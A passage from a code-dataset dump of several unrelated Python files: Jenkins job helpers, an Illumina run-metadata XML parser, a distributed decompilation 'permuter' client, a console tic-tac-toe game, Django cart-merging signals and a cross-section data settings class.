return []
return upstream_jobs
def get_upstream_jobs(self):
"""
Get all the possible upstream jobs
:return List of Job
"""
upstream_jobs = []
try:
for j in self._data['upstreamProjects']:
upstream_jobs.append(self.get_jenkins_obj().get_job(j['name']))
except KeyError:
return []
return upstream_jobs
def is_enabled(self):
data = self.poll(tree='color')
return 'disabled' not in data.get('color', '')
def disable(self):
"""
Disable job
"""
url = "%s/disable" % self.baseurl
return self.get_jenkins_obj().requester.post_url(url, data='')
def enable(self):
"""
Enable job
"""
url = "%s/enable" % self.baseurl
return self.get_jenkins_obj().requester.post_url(url, data='')
def delete_from_queue(self):
"""
Delete a job from the queue only if it's enqueued
:raise NotInQueue if the job is not in the queue
"""
if not self.is_queued():
raise NotInQueue()
queue_id = self._data['queueItem']['id']
url = urlparse.urljoin(self.get_jenkins_obj().get_queue().baseurl,
'queue/cancelItem?id=%s' % queue_id)
self.get_jenkins_obj().requester.post_and_confirm_status(url, data='')
return True
def get_params(self):
"""
Get the parameters for this job. Format varies by parameter type. Here
is an example string parameter:
{
'type': 'StringParameterDefinition',
'description': 'Parameter description',
'defaultParameterValue': {'value': 'default value'},
'name': 'FOO_BAR'
}
"""
places = ['actions', 'property']
found_definitions = False
for place in places:
if found_definitions:
return
actions = (x for x in self._data[place] if x is not None)
for action in actions:
try:
for param in action['parameterDefinitions']:
found_definitions = True
yield param
except KeyError:
continue
def get_params_list(self):
"""
Gets the list of parameter names for this job.
"""
return [param['name'] for param in self.get_params()]
def has_params(self):
"""
If job has parameters, returns True, else False
"""
if any("parameterDefinitions" in a for a in (self._data["actions"])
if a):
return True
if any("parameterDefinitions" in a for a in (self._data["property"])
if a):
return True
return False
def has_queued_build(self, build_params):
"""
Returns True if a build with build_params is currently queued.
"""
queue = self.jenkins.get_queue()
queued_builds = queue.get_queue_items_for_job(self.name)
for build in queued_builds:
if build.get_parameters() == build_params:
return True
return False
@staticmethod
def get_full_name_from_url_and_baseurl(url, baseurl):
"""
Get the full name for a job (including parent folders) from the
job URL.
"""
path = url.replace(baseurl, '')
split = path.split('/')
split = [urlparse.unquote(part) for part in split[::2] if part]
return '/'.join(split)
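# Illustrative example (hypothetical URLs): folder names alternate with
# literal "job" path segments, which the [::2] slice above strips out:
#   Job.get_full_name_from_url_and_baseurl(
#       "http://jenkins.example.com/job/my_folder/job/my_job/",
#       "http://jenkins.example.com")
#   returns "my_folder/my_job"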
def get_full_name(self):
"""
Get the full name for a job (including parent folders)
from the job URL.
"""
return Job.get_full_name_from_url_and_baseurl(
self.url, self.jenkins.baseurl)
def toggle_keep_build(self, build_number):
self.get_build(build_number).toggle_keep()
|
py | 1a3440ef657627d6d0db45e06528d64745c3859d | from typing import Tuple
from django import forms
from . import models
class CreateAnalysisForm(forms.ModelForm):
class Meta:
model = models.Analysis
fields: Tuple[str, ...] = ()
def save(self, commit=True):
self.instance.inputs = self.instance.default_input()
return super().save(commit=commit)
|
py | 1a344157e7a9af2b806e2057ab69394907f84fae | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# InteropDataset
# Library encapsulating the XML and bin files from MiSeq and HiSeq output.
#
# InteropMetadata
# Parser for XML files from MiSeq / HiSeq run data.
#
# See README for intro and basic examples.
#
# March 2013
# by nthmost ([email protected])
# with lots of help from ECO ([email protected])
import os
from collections import OrderedDict
from datetime import datetime
import xml.etree.ElementTree as ET
import xmltodict
from .utils import select_file_from_aliases
from .filemaps import XML_FILEMAP
class InteropMetadata(object):
"""Parser for sequencer's XML files describing a single run. Supply with directory to instantiate.
CHANGES:
0.3 (in progress) Switching to xmltodict from ElementTree.
0.2.2 runParameters supports both MiSeq and HiSeq formats.
0.2.1 No longer prioritizing CompletedJobInfo.xml (not reliably present).
0.2 Cleaner logical process for using the various XML files. No longer throws exceptions.
0.1 First released version.
"""
__version = 0.3 # version of this parser.
def __init__(self, xmldir):
"""Takes the absolute path of a sequencing run data directory as sole required variable.
Attempts to parse CompletedJobInfo.xml (or viable alias). If not available, uses
runParameters.xml and/or runInfo.xml, which have some overlapping info (but not all).
Individual parsers can be explicitly called via their respective methods.
Be aware that parsing methods are DESTRUCTIVE to existing instance data."""
self.xmldir = xmldir
self.experiment_name = "" # "RU1453:::/locus/data/run_data//1337/1453"
self.investigator_name = "" # "Locus:::Uncle_Jesse - 612 - MiSeq"
self.runID = "" # cf CompletedJobInfo.xml / RTARunInfo / Run param "Id"
# TODO: xml_datetimes
# We can learn end_datetime this from the RTAComplete.txt file.
# sample: 2/11/2014,17:25:13.217,Illumina RTA 1.18.42
#
#...but it would be nicer if we didn't have to (more files to track, no fun).
self.start_datetime = None
self.end_datetime = None
self.rta_run_info = { 'flowcell': '', 'instrument': '', 'date': '' }
# read_config: a list of dictionaries, each of which describe a single read from the sequencer.
self.read_config = []
# Flow cell layout: necessary to enable parsing of different machine types' binaries.
self.flowcell_layout = { }
# Read numbers from ResequencingRunStats.xml
# Example: { 'clusters_raw': 19494893, 'clusters_PF': 17381252,
# 'unindexed': 508055, 'unindexed_PF': 16873197,
# 'unaligned': 18572490, 'unaligned_PF': 16973197 }
self.resequencing_stats = {}
if self.get_xml_path('reseqstats') is not None:
self.parse_ResequencingRunStats(self.get_xml_path('reseqstats'))
# The main goal of parsing the XML is to find out read_config and flowcell_layout.
# A lot of other data is available, but only these two basics are necessary.
#
# CompletedJobInfo.xml has the most complete data from MiSeq machines, but only exists
# at the end of a run, and HiSeq machines don't even generate one.
#
# RunInfo.xml (containing just the basics) is always available during an active run.
#
# TODO: xml_flex (proposed improvement allowing a config file to set which tokens are required / not required.)
# Also we might want to specify priority of provenance (e.g. get start_datetime from 'runparams' first).
# If you (yes YOU) have any opinions about this, please email me: [email protected]
self.machine_id = ""
self.model = ""
self._xml_map = OrderedDict({ 'completed': [None, self.parse_CompletedJobInfo],
'runinfo': [None, self.parse_RunInfo],
'runparams': [None, self.parse_RunParameters] })
self._set_xml_map()
# cycle through XML files, filling from what's available.
for codename in self._xml_map:
if self._xml_map[codename][0] is not None:
self._xml_map[codename][1](self._xml_map[codename][0])
if codename == 'completed':
break
def _set_xml_map(self):
"""finds all available XML files, assigns them to an ordered dictionary
mapping of codename:[filepath,parse_function] """
for codename in self._xml_map:
self._xml_map[codename][0] = self.get_xml_path(codename)
def get_xml_path(self, codename):
"returns absolute path to XML file represented by data 'codename' or None if not available."
result = select_file_from_aliases(codename, XML_FILEMAP, self.xmldir)
return result
def parse_Run_ET(self, run_ET):
"parses chunk of XML associated with the RTA Run Info blocks in (at least) 2 xml files."
self.rta_run_info = { 'instrument': run_ET.find('Instrument').text, # M00612
'flowcell': run_ET.find('Flowcell').text, # 000000000-A316T
'date': run_ET.find('Date').text } # 130208
flowcell_ET = run_ET.find('FlowcellLayout')
self.flowcell_layout = { 'lanecount': int(flowcell_ET.attrib['LaneCount']),
'surfacecount': int(flowcell_ET.attrib['SurfaceCount']),
'swathcount': int(flowcell_ET.attrib['SwathCount']),
'tilecount': int(flowcell_ET.attrib['TileCount']) }
# Run / Reads - describes number of cycles per read (and if read is an Index) in sequencing run.
# Because parsing is understood to be destructive, and Reads can be found in multiple files,
# we start by emptying out whatever's currently in the read_config array for this instance.
self.read_config = []
read_num = 0
for item in run_ET.find("Reads"):
read_num += 1 # redundant safety assignment to read_num
self.read_config.append( {'read_num': read_num,
'cycles': int(item.attrib['NumCycles']),
'is_index': True if item.attrib['IsIndexedRead']=='Y' else False } )
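# Illustrative shape of the structures filled in above (values are
# hypothetical, e.g. a paired-end MiSeq run with one 8-cycle index read):
#   self.flowcell_layout == {'lanecount': 1, 'surfacecount': 2,
#                            'swathcount': 1, 'tilecount': 14}
#   self.read_config == [{'read_num': 1, 'cycles': 151, 'is_index': False},
#                        {'read_num': 2, 'cycles': 8, 'is_index': True},
#                        {'read_num': 3, 'cycles': 151, 'is_index': False}]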
def parse_ResequencingRunStats(self, filepath):
"""Parses ResequencingRunStatistics.xml (or viable alias) to fill instance variables."""
# TODO: xmltodict conversion
tree = ET.parse(filepath)
root = tree.getroot() # should be "StatisticsResequencing"
runstats_ET = root.find("RunStats")
self.resequencing_stats = { 'clusters_raw': int(runstats_ET.find('NumberOfClustersRaw').text),
'clusters_pf': int(runstats_ET.find('NumberOfClustersPF').text),
'unindexed': int(runstats_ET.find('NumberOfUnindexedClusters').text),
'unindexed_pf': int(runstats_ET.find('NumberOfUnindexedClustersPF').text),
'unaligned': int(runstats_ET.find('NumberOfUnalignedClusters').text),
'unaligned_pf': int(runstats_ET.find('NumberOfUnalignedClustersPF').text),
'duplicate': int(runstats_ET.find('NumberOfDuplicateClusters').text) }
def parse_RunInfo(self, filepath):
"parses Reads, Date, Flowcell, Instrument out of runInfo.xml"
#buf = open(filepath).read()
#root = xmltodict.parse(buf)['RunInfo']
tree = ET.parse(filepath)
run_ET = tree.getroot().find('Run') #little of use in this file except <Run> subelement.
self.runID = run_ET.attrib['Id']
#? is runNumber useful information? if so, what for?
#self.runNumber = run_ET.attrib['Number']
self.parse_Run_ET(run_ET)
if not self.read_config:
buf = open(filepath).read()
root = xmltodict.parse(buf)['RunInfo']
try:
Reads = root.get('Run')['Reads']['Read']
except KeyError:
pass
for read in Reads:
self.read_config.append(
{'read_num': int(read['@Number']),
'cycles': int(read['@NumCycles']),
'is_index': True if read['@IsIndexedRead'] == 'Y' else False
})
def _parse_runparams(self, xml_dict):
# Different format from that in CompletedJobInfo.xml (contains read Number).
# And there are two possible keys to indicate the same datastructure. So fun.
try:
Reads = xml_dict.get('Reads')['Read']
except KeyError:
Reads = xml_dict.get('Reads')['RunInfoRead']
if not self.read_config:
for read in Reads:
self.read_config.append(
{'read_num': int(read['@Number']),
'cycles': int(read['@NumCycles']),
'is_index': True if read['@IsIndexedRead']=='Y' else False
} )
self.rta_version = xml_dict.get('RTAVersion', '')
rawdate = xml_dict.get('RunStartDate', '') # format: 130208 YYMMDD
if rawdate:
self.start_datetime = datetime.strptime(rawdate, '%y%m%d')
self.runID = xml_dict.get('RunID', '')
self.experiment_name = xml_dict.get('ExperimentName', '')
self.flowcell_position = xml_dict.get('FCPosition', '')
self.flowcell_barcode = xml_dict.get('Barcode', '')
self.machine_id = xml_dict.get('ScannerID', '')
def parse_RunParameters(self, filepath):
"""parses runParameters.xml (or viable alias) to fill instance variables.
Need to implement further since HiSeq output has no CompletedJobInfo.xml
"""
buf = open(filepath).read()
root = xmltodict.parse(buf)['RunParameters']
# a dirty hack to figure out which version of this file we're reading.
if 'Reads' in list(root['Setup'].keys()):
self._parse_runparams(root['Setup']) # HiSeq
elif 'Reads' in list(root.keys()):
self._parse_runparams(root) # MiSeq
else:
pass # NextSeq
self.model = self._get_model()
def parse_CompletedJobInfo(self, filepath):
"""parses CompletedJobInfo.xml (or viable alias) to fill instance variables.
Not all machines generate this file, so we avoid relying on it.
"""
# TODO: xmltodict conversion
# comments show example data from a real MiSeq run (2013/02)
tree = ET.parse(filepath)
root = tree.getroot() #should be "AnalysisJobInfo"
# Something to be aware of: RTARunInfo contains a "version" attribute.
# (This parser knows how to deal with version 2.)
self.rta_version = root.find("RTARunInfo").attrib['Version']
# original location of data output from the sequencer.
self.output_folder = root.find("RTAOutputFolder").text
# TODO: xml_datetimes
self.start_datetime = root.find("StartTime").text # 2013-02-09T15:51:50.0811937-08:00
self.end_datetime = root.find("CompletionTime").text # 2013-02-09T16:06:44.0124452-08:00
# dechunk all of the major sections we want to extract data from.
sheet_ET = root.find("Sheet")
header_ET = sheet_ET.find("Header")
run_ET = root.find("RTARunInfo").find("Run")
# Sheet / *
# TODO: deprecate this attribute (can't get it from HiSeq XML)
try:
self.runtype = sheet_ET.find("Type").text # MiSeq, HiSeq, etc.
except AttributeError:
#older (early 2012) XML files have no "Type" token.
self.runtype = ""
# Sheet / Header / *
try:
self.investigator_name = header_ET.find("InvestigatorName").text
self.project_name = header_ET.find("ProjectName").text
self.experiment_name = header_ET.find("ExperimentName").text
except AttributeError:
pass
# RTARunInfo / Run / *
self.runID = run_ET.attrib["Id"]
self.parse_Run_ET(run_ET)
def _get_model(self):
"""
Guesses the sequencer model from the run folder name
Current naming schema for Illumina run folders, as far as I know;
no documentation was found on this. Illumina introduced a field called
'InstrumentID' in the NextSeq runParameters.xml, which might be an
option for the future.
MiSeq: 150130_M01761_0114_000000000-ACUR0
NextSeq: 150202_NS500318_0047_AH3KLMBGXX
HiSeq 2000: 130919_SN792_0281_BD2CHRACXX
HiSeq 2500: 150203_D00535_0052_AC66RWANXX
HiSeq 4000: 150210_K00111_0013_AH2372BBXX
HiSeq X: 141121_ST-E00107_0356_AH00C3CCXX
"""
# retired this line. getting self.machine_id from ScannerID field in _parse_runparams()
# date, machine_id, run_number, fc_string = os.path.basename(self.runID).split("_")
if self.machine_id.startswith("NS"):
model = "NextSeq 500"
elif self.machine_id.startswith("M"):
model = "MiSeq"
elif self.machine_id.startswith("D"):
model = "HiSeq 2500"
elif self.machine_id.startswith("SN"):
model = "HiSeq 2000"
# elif machine_id.startswith("??"):
# model = "Hiseq 3000"
elif self.machine_id.startswith("K"):
model = "HiSeq 4000"
elif self.machine_id.startswith("ST"):
model = "HiSeq X"
else:
model = "Unidentified"
return model
def prettyprint_general(self):
out = "General Config:\n" + \
"Model: " + self.model + "\n" + \
"Run Folder Name: " + os.path.basename(self.runID)
return out
def prettyprint_read_config(self):
out = "Read Config:"
for read in self.read_config:
out += " Read %i: %i cycles %s" % (read['read_num'], read['cycles'],
"(Index)" if read['is_index'] else "")
return out
def prettyprint_flowcell_layout(self):
out = """Flowcell Layout:
Tiles: %(tilecount)i
Lanes: %(lanecount)i
Surfaces: %(surfacecount)i
Swaths: %(swathcount)i""" % self.flowcell_layout
return out
def __str__(self):
"""
Print the most important metadata
"""
out = self.prettyprint_general() + "\n"
out += self.prettyprint_read_config() + "\n"
out += self.prettyprint_flowcell_layout() + "\n"
return out
def to_dict(self):
return { 'runID': self.runID,
'experiment_name': self.experiment_name,
'start_datetime': self.start_datetime,
'end_datetime': self.end_datetime,
'model': self.model,
'flowcell_layout': self.flowcell_layout,
'flowcell_barcode': self.flowcell_barcode,
'flowcell_position': self.flowcell_position, }
|
py | 1a3442c325cc8c459cb85e674f979dfa57b3f123 | from multiprocessing import Queue
import re
import threading
from typing import Optional, Tuple
import zlib
from ..candidate import CandidateResult
from ..helpers import exception_to_string
from ..permuter import (
EvalError,
EvalResult,
Feedback,
FeedbackItem,
Finished,
Message,
NeedMoreWork,
Permuter,
Task,
WorkDone,
)
from ..profiler import Profiler
from .core import (
PermuterData,
SocketPort,
json_prop,
permuter_data_to_json,
)
def _profiler_from_json(obj: dict) -> Profiler:
ret = Profiler()
for key in obj:
assert isinstance(key, str), "json properties are strings"
stat = Profiler.StatType[key]
time = json_prop(obj, key, float)
ret.add_stat(stat, time)
return ret
def _result_from_json(obj: dict, source: Optional[str]) -> EvalResult:
if "error" in obj:
return EvalError(exc_str=json_prop(obj, "error", str), seed=None)
profiler: Optional[Profiler] = None
if "profiler" in obj:
profiler = _profiler_from_json(json_prop(obj, "profiler", dict))
return CandidateResult(
score=json_prop(obj, "score", int),
hash=json_prop(obj, "hash", str) if "hash" in obj else None,
source=source,
profiler=profiler,
)
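# Illustrative message shapes accepted by _result_from_json (field names taken
# from the parsing above; the values are hypothetical):
#   {"error": "compile failed"}                          -> EvalError
#   {"score": 312, "hash": "ab12...", "profiler": {...}} -> CandidateResult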
def _make_script_portable(source: str) -> str:
"""Parse a shell script and get rid of the machine-specific parts that
import.py introduces. The resulting script must be run in an environment
that has the right binaries in its $PATH, and with a current working
directory similar to where import.py found its target's make root."""
lines = []
for line in source.split("\n"):
if re.match("cd '?/", line):
# Skip cd's to absolute directory paths. Note that shlex quotes
# its argument with ' if it contains spaces/single quotes.
continue
if re.match("'?/", line):
quote = "'" if line[0] == "'" else ""
ind = line.find(quote + " ")
if ind == -1:
ind = len(line)
else:
ind += len(quote)
lastind = line.rfind("/", 0, ind)
assert lastind != -1
# Emit a call to "which" as the first part, to ensure the called
# binary still sees an absolute path. qemu-irix requires this,
# for some reason.
line = "$(which " + quote + line[lastind + 1 : ind] + ")" + line[ind:]
lines.append(line)
return "\n".join(lines)
def make_portable_permuter(permuter: Permuter) -> PermuterData:
with open(permuter.scorer.target_o, "rb") as f:
target_o_bin = f.read()
with open(permuter.compiler.compile_cmd, "r") as f2:
compile_script = _make_script_portable(f2.read())
return PermuterData(
base_score=permuter.base_score,
base_hash=permuter.base_hash,
fn_name=permuter.fn_name,
filename=permuter.source_file,
keep_prob=permuter.keep_prob,
need_profiler=permuter.need_profiler,
stack_differences=permuter.scorer.stack_differences,
compile_script=compile_script,
source=permuter.source,
target_o_bin=target_o_bin,
)
class Connection:
_port: SocketPort
_permuter_data: PermuterData
_perm_index: int
_task_queue: "Queue[Task]"
_feedback_queue: "Queue[Feedback]"
def __init__(
self,
port: SocketPort,
permuter_data: PermuterData,
perm_index: int,
task_queue: "Queue[Task]",
feedback_queue: "Queue[Feedback]",
) -> None:
self._port = port
self._permuter_data = permuter_data
self._perm_index = perm_index
self._task_queue = task_queue
self._feedback_queue = feedback_queue
def _send_permuter(self) -> None:
data = self._permuter_data
self._port.send_json(permuter_data_to_json(data))
self._port.send(zlib.compress(data.source.encode("utf-8")))
self._port.send(zlib.compress(data.target_o_bin))
def _feedback(self, feedback: FeedbackItem, server_nick: Optional[str]) -> None:
self._feedback_queue.put((feedback, self._perm_index, server_nick))
def _receive_one(self) -> bool:
"""Receive a result/progress message and send it on. Returns true if
more work should be requested."""
msg = self._port.receive_json()
msg_type = json_prop(msg, "type", str)
if msg_type == "need_work":
return True
server_nick = json_prop(msg, "server", str)
if msg_type == "init_done":
base_hash = json_prop(msg, "hash", str)
my_base_hash = self._permuter_data.base_hash
text = "connected"
if base_hash != my_base_hash:
text += " (note: mismatching hash)"
self._feedback(Message(text), server_nick)
return True
if msg_type == "init_failed":
text = "failed to initialize: " + json_prop(msg, "reason", str)
self._feedback(Message(text), server_nick)
return False
if msg_type == "disconnect":
self._feedback(Message("disconnected"), server_nick)
return False
if msg_type == "result":
source: Optional[str] = None
if msg.get("has_source") == True:
# Source is sent separately, compressed, since it can be
# large (hundreds of kilobytes is not uncommon).
compressed_source = self._port.receive()
try:
source = zlib.decompress(compressed_source).decode("utf-8")
except Exception as e:
text = "failed to decompress: " + exception_to_string(e)
self._feedback(Message(text), server_nick)
return True
try:
result = _result_from_json(msg, source)
self._feedback(WorkDone(self._perm_index, result), server_nick)
except Exception as e:
text = "failed to parse result message: " + exception_to_string(e)
self._feedback(Message(text), server_nick)
return True
raise ValueError(f"Invalid message type {msg_type}")
def run(self) -> None:
finish_reason: Optional[str] = None
try:
self._send_permuter()
self._port.receive_json()
finished = False
# Main loop: send messages from the queue on to the server, and
# vice versa. Currently we are being lazy and alternate between
# sending and receiving; this is nicely simple and keeps us on a
# single thread, however it could cause deadlocks if the server
# receiver stops reading because we aren't reading fast enough.
while True:
if not self._receive_one():
continue
self._feedback(NeedMoreWork(), None)
# Read a task and send it on, unless there are no more tasks.
if not finished:
task = self._task_queue.get()
if isinstance(task, Finished):
# We don't have a way of indicating to the server that
# all is done: the server currently doesn't track
# outstanding work so it doesn't know when to close
# the connection. (Even with this fixed we'll have the
# problem that servers may disconnect, losing work, so
# the task never truly finishes. But it might work well
# enough in practice.)
finished = True
else:
work = {
"type": "work",
"work": {
"seed": task[1],
},
}
self._port.send_json(work)
except EOFError:
finish_reason = "disconnected from permuter@home"
except Exception as e:
errmsg = exception_to_string(e)
finish_reason = f"permuter@home error: {errmsg}"
finally:
self._feedback(Finished(reason=finish_reason), None)
self._port.shutdown()
self._port.close()
def start_client(
port: SocketPort,
permuter: Permuter,
perm_index: int,
feedback_queue: "Queue[Feedback]",
priority: float,
) -> "Tuple[threading.Thread, Queue[Task], Tuple[int, int, float]]":
port.send_json(
{
"method": "connect_client",
"priority": priority,
}
)
obj = port.receive_json()
if "error" in obj:
err = json_prop(obj, "error", str)
# TODO use another exception type
raise Exception(f"Failed to connect: {err}")
num_servers = json_prop(obj, "servers", int)
num_clients = json_prop(obj, "clients", int)
num_cores = json_prop(obj, "cores", float)
permuter_data = make_portable_permuter(permuter)
task_queue: "Queue[Task]" = Queue()
conn = Connection(
port,
permuter_data,
perm_index,
task_queue,
feedback_queue,
)
thread = threading.Thread(target=conn.run, daemon=True)
thread.start()
stats = (num_clients, num_servers, num_cores)
return thread, task_queue, stats
|
py | 1a344461938d13d114c5d232eec54156ccc6cfa8 | # TIC TAC TOE Minmax algorithm
'''
1. Backtracking algorithm
2. Max will try to maximize its utility
3. Min will try to minimize the human player's utility to win
4. Time complexity : O(b^d)
b : branching factor (choices, number of possible move)
d : depth
'''
# import package
import random
# Format colour
bright_cyan = "\033[0;96m"
board = [' ' for i in range(10)]
def insertLetter(letter, pos):
'''
insert either 'O' or 'X' at perticular position
'''
board[pos] = letter
def spaceIsFree(pos):
'''
Boolean : check whether the given position on the board is empty
'''
return board[pos] == ' '
def printBoard(board):
'''
Display the board
'''
# "board" is a list of 10 strings representing the board (ignore index 0)
print(' | |')
print(' ' + board[1] + ' | ' + board[2] + ' | ' + board[3])
print(' | |')
print('-----------')
print(' | |')
print(' ' + board[4] + ' | ' + board[5] + ' | ' + board[6])
print(' | |')
print('-----------')
print(' | |')
print(' ' + board[7] + ' | ' + board[8] + ' | ' + board[9])
print(' | |')
def isWinner(board, letter):
'''
    Boolean : check whether the winning criteria are met for the given letter
'''
# condition of horizontal, vertical, diagonal
return (board[1] == letter and board[2] == letter and board[3] == letter) or \
(board[4] == letter and board[5] == letter and board[6] == letter) or \
(board[7] == letter and board[8] == letter and board[9] == letter) or \
(board[1] == letter and board[4] == letter and board[7] == letter) or \
(board[2] == letter and board[5] == letter and board[8] == letter) or \
(board[3] == letter and board[6] == letter and board[9] == letter) or \
(board[1] == letter and board[5] == letter and board[9] == letter) or \
(board[3] == letter and board[5] == letter and board[7] == letter)
def playerMove():
'''
Take the input from user and validate user's input
'''
run = True
while run:
        try:
            move = int(input("Select a position to place 'X' (1-9) : "))
            if move > 0 and move < 10:
                if spaceIsFree(move):
                    run = False
                    insertLetter('X', move)
                else:
                    print("Position is already occupied 😳")
            else:
                print("Please enter a position within the valid range 😏")
        except ValueError:
            print("Please enter a valid number 😏")
def compMove():
'''
    Decide the computer's move, i.e. where to place 'O' so that it wins
'''
# 1. winning move
# 2. Block move ,if human gets benefited
# 3. move at corner
# 4. move at center
# 5. move at any edge
possibleMove = [
x for x, letter in enumerate(board) if letter == ' ' and x != 0
]
move = 0
    # 1st way -> check whether the computer can win outright; if not, then
    # try to block the opponent's winning move
for let in ['O', 'X']:
for i in possibleMove:
# replica of board
boardCopy = board[:]
boardCopy[i] = let
if isWinner(boardCopy, let):
move = i
return move
if board[1] == 'X' or board[3] == 'X' or board[7] == 'X' or board[9] == 'X':
if 5 in possibleMove:
move = 5
return move
edgesOpen = []
if (board[1] == 'X' and board[9] == 'X') or (board[3] == 'X'
and board[7] == 'X'):
for i in possibleMove:
if i in [2, 4, 6, 8]:
edgesOpen.append(i)
    # randomly select an edge to move into
if len(edgesOpen) > 0:
move = selectRandom(edgesOpen)
return move
    # Otherwise prefer an open corner (same pattern as the edge selection above)
cornersOpen = []
# Check whether there is any corner is empty if find empty then we place
# letter in that corner position
for i in possibleMove:
if i in [1, 3, 7, 9]:
cornersOpen.append(i)
# randomly select a corner to move Into
if len(cornersOpen) > 0:
move = selectRandom(cornersOpen)
return move
    # Place letter at the center position
if 5 in possibleMove:
move = 5
return move
# Check whether there is any edge is empty if find empty then we place
# letter in that edge position
for i in possibleMove:
if i in [2, 4, 6, 8]:
edgesOpen.append(i)
    # randomly select an edge to move into
if len(edgesOpen) > 0:
move = selectRandom(edgesOpen)
return move
def selectRandom(li):
return random.choice(li)
def isBoardFull(board):
if board.count(' ') > 1:
return False
else:
return True
# Human = 'X'
# Bot = 'O'
def main():
'''
Main function
'''
print(bright_cyan +
"# ----------- Welcome to TIC TAC TOE ------------- #")
name = input("Enter your name : ")
print("👲 {} : \'X\' and 🤖 Computer : \'O\' ".format(name.capitalize()))
print()
printBoard(board)
while not (isBoardFull(board)):
if not isWinner(board, 'O'):
playerMove() # Ask player for next move
printBoard(board) # print board
else:
print("\nOOPS O\'s won the game 😞 !!")
break
if not isWinner(board, 'X'):
move = compMove() # Ask computer for next move
if move == 0:
print('Tie game !!')
else:
insertLetter('O', move)
print("Computer enter \'O\' at Position : {}".format(move))
printBoard(board) # print board
else:
print("\nYeah X\'s won the game 😎 !!")
break
if isBoardFull(board):
print("Game over !!")
main()
while True:
print()
ans = input("Do want to play again 😀 ... ? (Y|N) : ")
print() # next line
    if ans.lower() == 'y':
board = [' ' for i in range(10)]
main()
else:
break
|
py | 1a344596357aea908122f211908ad470915288e0 | from django.apps import AppConfig
from django.db.models.signals import post_migrate
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.signals import user_logged_in
def add_cart_wish(sender, user, request, **kwargs):
from products.models import Cart, WishList
if request.session.exists(request.session.session_key):
cart_session = Cart.objects.filter(session_key=request.session.session_key)
wish_session = WishList.objects.filter(session_key=request.session.session_key)
cart = Cart.objects.filter(user=user)
wish = WishList.objects.filter(user=user)
if cart_session:
cart_session = cart_session.first()
if cart and cart.first().products.count() > 0:
cart = cart.first()
plist = []
for p in cart.products.all():
plist.append(p.product)
for p in cart_session.products.all():
if p.product not in plist:
p.cart = cart
p.save()
cart_session.delete()
else:
if cart:
cart.first().delete()
cart_session.user = user
cart_session.session_key = None
cart_session.save()
if wish_session:
wish_session = wish_session.first()
if wish and wish.first().products.count() > 0:
wish = wish.first()
for p in wish_session.products.all():
if p not in wish.products.all():
wish.products.add(p)
wish.save()
wish_session.delete()
else:
if wish:
wish.first().delete()
wish_session.user = user
wish_session.session_key = None
wish_session.save()
def add_site_info(sender, **kwargs):
from .models import SiteInfo
try:
info = SiteInfo.objects.all().first()
except ObjectDoesNotExist:
info = None
if info is None:
info = SiteInfo(
name='name',
name_ar='name_ar',
address='address',
address_ar='address_ar',
email='[email protected]',
phone='0123456789',
facebook='www.facebook.com',
twitter='www.twitter.com',
instagram='www.instagram.com',
linkedin='www.linkedin.com'
)
info.save()
class AccountsConfig(AppConfig):
name = 'accounts'
def ready(self):
post_migrate.connect(add_site_info, sender=self)
user_logged_in.connect(add_cart_wish)
|
py | 1a3446520d0787ec9e8ea4fb3d2de7f73b9dc633 | # -*- coding: utf-8 -*-
"""datasettings.py
The user needs to define the required data to be stored on the containers.
This container stores all the attributes and settings for the required data.
Created on Sat Mar 19 18:30:00 2022 @author: Dan Kotlyar and Bailey Painter
Last updated on Tue Apr 01 11:30:00 2022 @author: Dan Kotlyar
email: [email protected]
"""
import numpy as np
from xsInterface.errors.checkerrors import _isint, _islist, _isbool, _inlist,\
_ispositive, _isstr, _isuniquelist, _isarray,\
_is1darray, _isequallength, _isBoundArray
from xsInterface.containers.container_header import DATA_TYPES
class DataSettings():
"""
Stores the names and data that are expected to be stored on containers
Parameters
-----------
NG : int
number of energy groups for multi-group parameters
DN : int
Delayed neutron groups for kinetic parameters
macro : boolean
indicate whether macro data is expected to be provided
micro : boolean
indicate whether micro data is expected to be provided
kinetics : boolean
indicate whether kinetic data is expected to be provided
meta : boolean
indicate whether meta data is expected to be provided
isotopes : array
ZZAAA0/1 for all the isotopes to be provided
Attributes
-----------
NG : int
number of energy groups for multi-group parameters
DN : int
delayed neutron groups for kinetic parameters
dataFlags : dict
boolean flags to indicate the data types that are provided
    macro : list
        contains all the macro attributes (e.g., ``abs``)
    micro : list
        contains all the micro attributes for all the isotopes (e.g., ``fiss``)
    kinetics : list
        contains all the kinetic attributes (e.g., ``beta``)
    meta : list
        contains all the metadata attributes (e.g., ``time``)
Methods
--------
    AddData(dataType, attributes):
Add relevant macroscopic/microscopic/meta data
Raises
-------
TypeError
If any of the parameters, e.g., ``NG``, ``DN`` are not integers.
If any of the ``macro``, ``micro``, ``kinetics``, ``meta``
are not booleans.
ValueError
If ``NG`` is below one.
If ``DN`` is below one.
If ``isotopes`` list is not provided but ``micro`` data is expected.
KeyError
        If ``dataType`` does not exist in DATA_TYPES.
Examples
---------
>>> rc = DataSettings(NG=2, DN=7, macro=True, micro=False, kinetics=True,
>>> meta=False, isotopes=None)
"""
def __init__(self, NG, DN, macro=True, micro=False, kinetics=False,
meta=False, isotopes=None):
"""Assign parameters that describe the required data to be provided"""
# Check variables types
_isint(NG, "number of energy groups")
_isint(DN, "number of delayed neutron groups")
_isbool(macro, "macro data")
_isbool(micro, "micro data")
_isbool(kinetics, "kinetics data")
_isbool(meta, "meta data")
# Check values/entries for different variables
_ispositive(NG, "number of energy groups")
_ispositive(DN, "number of delayed neutron groups")
if micro:
if isotopes is not None:
isotopes = np.array(isotopes, dtype=int)
else:
raise ValueError("<isotopes> list/array must be provided")
# Reset variables
self.ng = NG # number of energy groups
self.dn = DN # number of delayed neutron groups
self.isotopes = isotopes
self.dataFlags = {"macro": macro, "micro": micro,
"kinetics": kinetics, "meta": meta}
self.macro = []
self.micro = []
self.kinetics = []
self.meta = []
def AddData(self, dataType, attributes):
"""Add relevant macroscopic/microscopic/meta data
Parameters
----------
dataType : ["macro", "micro", "kinetics", "meta"]
type of data
attributes : list of strings
user-defined names for the provided data type (e.g., ``abs``)
Examples
--------
>>> rc.AddData("macro", ["abs", "nsf", "sct"], "array")
>>> rc.AddData("kinetics", ["beta", "decay"], "array")
"""
# Error checking
_isstr(dataType, "data types")
_inlist(dataType, "data types", DATA_TYPES)
if not self.dataFlags[dataType]:
raise ValueError("Data type <{}> was disabled when DataSettings "
"object was created".format(dataType))
_islist(attributes, "names of "+dataType+" attributes")
_isuniquelist(attributes, "attribute names in ")
# check if data is already populated
